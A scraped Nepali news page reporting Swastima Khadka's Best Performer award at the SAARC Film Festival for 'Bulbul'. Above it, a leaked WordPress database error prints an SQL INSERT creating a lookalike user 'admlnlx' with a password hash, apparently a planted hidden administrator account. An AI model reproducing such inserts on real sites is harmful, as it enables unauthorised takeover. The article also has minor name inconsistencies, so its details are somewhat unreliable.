WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BS9v07t65.876wHcZFN.hzhu6/xjkE/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 23:23:47', '', 'admlnlx', 'admlnlx')

‘सार्क फिल्म फेस्टिबल’ मा स्वस्तिमाले जितिन् ‘बेस्ट परफर्मर’ अवार्ड – Gaule Khabar

‘सार्क फिल्म फेस्टिबल’ मा स्वस्तिमाले जितिन् ‘बेस्ट परफर्मर’ अवार्ड

‘सार्क फिल्म फेस्टिबल’ मा स्वस्तिमाले जितिन् ‘बेस्ट परफर्मर’ अवार्ड

गाउँले न्युज, २३ असार, काठमाडौं । श्रीलङ्कामा आयोजित सार्क फिल्म फेस्टिबलमा नायिका स्वस्तिमा खड्काले अवार्ड जितेकी छिन् ।
श्वेता खड्काले फिल्म ‘बुलबुल’ बाट उक्त अवार्ड हात पारेकी हुन । नायिकाले आफ्नो इन्स्टाग्राम अकाउन्टमा आफूले ‘बेस्ट परफर्मर’ को उपाधि हात पारेको जानकारी दिएकी छिन् ।
उनले अवार्ड हातमा बोक्दै उक्त अवार्ड नेपालको लागि भएको बताएकी छिन् ।
यसअघि नायक गरिमा पन्तले चलचित्र झोलाबाट उत्कृष्ट नायिकाको अवार्ड हात पारेकी थिइन् ।
सार्क फिल्म फेस्टिबलमा दिनेश राउत निर्देशित चलचित्र ‘प्रसाद’ र बुलबुल प्रतिस्पर्धामा थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका